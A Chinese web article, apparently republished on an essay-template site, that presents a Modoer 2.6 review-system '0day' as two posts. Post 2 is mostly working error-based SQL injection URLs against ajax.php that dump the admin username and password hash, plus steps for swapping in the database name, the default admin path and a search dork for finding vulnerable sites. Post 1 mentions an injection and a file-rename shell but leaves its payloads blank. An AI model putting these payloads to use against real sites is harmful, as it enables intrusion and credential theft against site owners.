Modoer点评系统 2.6 0day漏洞预警

2024-04-07

Modoer点评系统 2.6 0day漏洞预警(精选2篇)

篇1:Modoer点评系统 2.6 0day漏洞预警

起因,许诺说他的网站被人黑了,大半夜的叫我来分析下搞个exp给他,官方已经出了补丁,网上还没有exp,对比了下补丁漏洞出现在datacall_class.php文件,有兴趣的朋友自己跟一下。

注入:

注:上面的datacallname值不是乱码,是编码过的,

再附一个自己发现的后台文件重命名拿shell。

path:

filename:

newfilename:

篇2:Modoer点评系统 2.6 0day漏洞预警

测试漏洞:ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_admin Where id=1),1,1)=0x61 %23

存在MySQL Query Error: Update modoer_shops 说明存在注入

接下来爆用户名

爆用户名:

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

FROM `modo`.modoer_admin LIMIT 0,1)在这里吧`modo`.替换为刚才跑出的库名 即为

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

用户名出来了 继续密码

密码:

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

跟以上方法一样 同样替换库名`modo`. 为跑出的库名

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

密码出来

在写这篇文章的同时 又看了下 也可以同时爆账号密码

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(modoer_admin.password,0x3c,modoer_admin.adminname) FROM `ytmodoer`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

找到语句中的 这个 如果网站有两个或多个用户名或密码 我们可以把201 替换为202 可以同时爆出!

自行测试!

又一段代码 直接全爆 不用加库名 实践嘛 主要是给大家介绍下方法

[pre]

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(modoer_admin.password,0x3c,modoer_admin.adminname) FROM modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

加这段代码 直接爆出账号密码 (后来才发现的)

下面就是后台

默认后台地址

Admincp.php

关键字:

intitle:Powered by Modoer intitle:游戏

测试漏洞:

ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_admin Where id=1),1,1)=0x61%23

密码:

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.password,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

用户名:

ajax.php?action=digg&idtype=shop&keyid=1 and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,modoer_admin.adminname,0x27,0x7e) FROM `modo`.modoer_admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

同时爆账号密码

本文来自 360文秘网(www.360wenmi.com),转载请保留网址和出处

【Modoer点评系统 2.6 0day漏洞预警】相关文章:

点评作文05-14

录像课点评04-08

时政点评范文05-18

经典美文点评07-15

点评述职材料04-12

会议点评范文04-15

作文范例点评05-09

高考作文点评05-11

简历疑惑点评05-14

优秀范文点评05-15

上一篇:小学生七彩桥作文下一篇:邵玉春同志申报“周口市优秀教师”材料